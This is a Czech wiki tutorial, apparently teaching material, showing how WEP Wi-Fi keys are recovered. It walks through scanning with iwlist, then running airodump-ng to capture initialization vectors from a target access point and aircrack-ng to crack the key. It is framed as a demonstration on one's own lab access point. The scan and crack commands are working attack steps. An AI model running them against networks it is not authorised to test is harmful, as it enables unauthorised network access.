Prolomení WEP

Z Milan Kerslager
Verze z 16. 12. 2010, 14:29, kterou vytvořil Milan.Kerslager (diskuse | příspěvky) (Externí odkazy: +link)
Přejít na: navigace, hledání

Zabezpečení Wi-Fi je komplexní problematika, která je popsána v slajdech pro přednášku o bezpečnosti, které jsou dostupné na stránce Soubor:PBE-07-Bezpečnost Wi-Fi.odp.

Zranitelnost WEP

Šifrování pomocí WEP je prolomeno a existuje několik postupů, pomocí kterých je možné z odposlechu běžného provozu zjistit symetrický šifrovací klíč. Proto není bezpečné toto šifrování používat. Na ukázku je možné zřídit vlastní AP, které zabezpečíme pomocí WEP klíče. Na přístupový bod připojíme klienta a zajistíme, aby dostatečně komunikoval, tj. nejlépe stahoval přes bezdrátovou síť nějaké soubory. Do jeho dosahu umístíme počítač, který bude sloužit k odposlechu bezdrátového provozu.

Bezdrátové rozhraní

Informace o tom, jaké nastavení má bezdrátové rozhraní v počítači, podává příkaz iwconfig, který je nutné spustit jako root (správce systému):

# iwconfig
lo        no wireless extensions.

eth1      IEEE 802.11  ESSID:"RADIUS"  Nickname:""
          Mode:Managed  Frequency:2.412 GHz  Access Point: 00:1A:30:2C:57:F0   
          Bit Rate=54 Mb/s   Tx-Power:24 dBm   
          Retry min limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Managementmode:All packets received
          Link Quality=5/5  Signal level=-45 dBm  Noise level=-91 dBm
          Rx invalid nwid:0  Rx invalid crypt:35  Rx invalid frag:0
          Tx excessive retries:2094  Invalid misc:0   Missed beacon:0

eth0      no wireless extensions.

Z výpisu je patrné, že bezdrátové rozhraní je v počítači nazváno eth1. Aktuálně je připojeno k bezdrátové síti RADIUS.

Zjištění bezdrátové sítě

Základní informace o okolních bezdrátových sítích se šíří pomocí majákových rámců (beacon frame), které obsahují název sítě (SSID), frekvenci, na které bezdrátová síť vysílá (v pásmu 2,4 nebo 5 GHz), informace o použitém zabezpečení sítě a další údaje.

# iwlist eth1 scanning
         Cell 01 - Address: 00:1A:30:2C:57:F0
                   ESSID:"RADIUS"
                   Mode:Managed
                   Frequency:2.412 GHz (Channel 1)
                   Quality:5/5  Signal level:-37 dBm  Noise level:-94 dBm
                   IE: IEEE 802.11i/WPA2 Version 1
                       Group Cipher : CCMP
                       Pairwise Ciphers (1) : CCMP
                       Authentication Suites (1) : 802.1x
                   Encryption key:on
                   Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 6 Mb/s; 9 Mb/s
                             11 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
                             48 Mb/s; 54 Mb/s
         Cell 02 - Address: 00:24:01:8F:93:0E
                   ESSID:"PrivateNet"
                   Mode:Managed
                   Frequency:2.437 GHz (Channel 6)
                   Quality:1/5  Signal level:-90 dBm  Noise level:-93 dBm
                   Encryption key:on
                   Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                             9 Mb/s; 12 Mb/s; 48 Mb/s; 18 Mb/s; 24 Mb/s
                             36 Mb/s; 54 Mb/s

Z výpisu je patrné, že v dosahu jsou dvě bezdrátové sítě. Jako první je bezdrátová síť RADIUS, která vysílá na kanálu 1, její přístupový bod (AP) má MAC adresu 00:1A:30:2C:57:F0 a ke které je aktuálně počítač podle předchozího výpisu připojen. Druhá síť se nazývá PrivateNet, vysílá na kanále 6, její přístupový bod má MAC adresu 00:24:01:8F:93:0E.

Odposlech provozu

Pro odposlech provozu je nutné, aby byla bezdrátová karta počítače uvedena do klidu, a proto je nutné se odpojit od bezdrátové sítě RADIUS. V grafickém prostředí je možné kliknout na ikonu bezdrátového připojení a zvolit Odpojit. Poté použijeme monitorovací nástroj airodump-ng:

airodump-ng --ivs -w data --bssid 00:24:01:8F:93:0E --channel 6 eth1

Výše uvedený příkaz začne zaznamenávat do souborů začínajících na data tak zvané inicializační vektory, ze kterých je možné dále vypočítat šifrovací klíč (bez toho, aby bylo nutné monitorovací příkaz přerušovat. Pro úspěšné dekódování šifrovacího klíče je nutné nasbírat zhruba alespoň 25 000 vektorů (pro 64bitový klíč), spíše však mnohem více (tj. 100&nbsp000 až milión).

Dekódování klíče

Pro dekódování šifrovacího klíče z nasbíraných inicializačních vektorů se používá příkaz aircrack-ng:, který se pokusí z dostupných zaznamenaných inicializačních vektorů určit symetrický šifrovací klíč.

aircrack-ng *.ivs

Zápis *.ivs umožní zpracovat všechny IVS soubory, které byly uloženy jednotlivými spuštěními monitorovacího příkazu airodump-ng. Výpočet klíče je možné ovlivnit různými parametry. Pokud známe délku použitého klíče, můžeme ji uvést pomocí parametru -n 64, kde 64 je délka klíče (běžně též 128). Délku výpočtu hrubou silou je možné ovlivnit (prodloužit) nastavením parametru například -f 128. V takovém případě je možné, že bude stačit méně nasbíraných inicializačních vektorů, ale výpočet se výrazně prodlouží.

Externí odkazy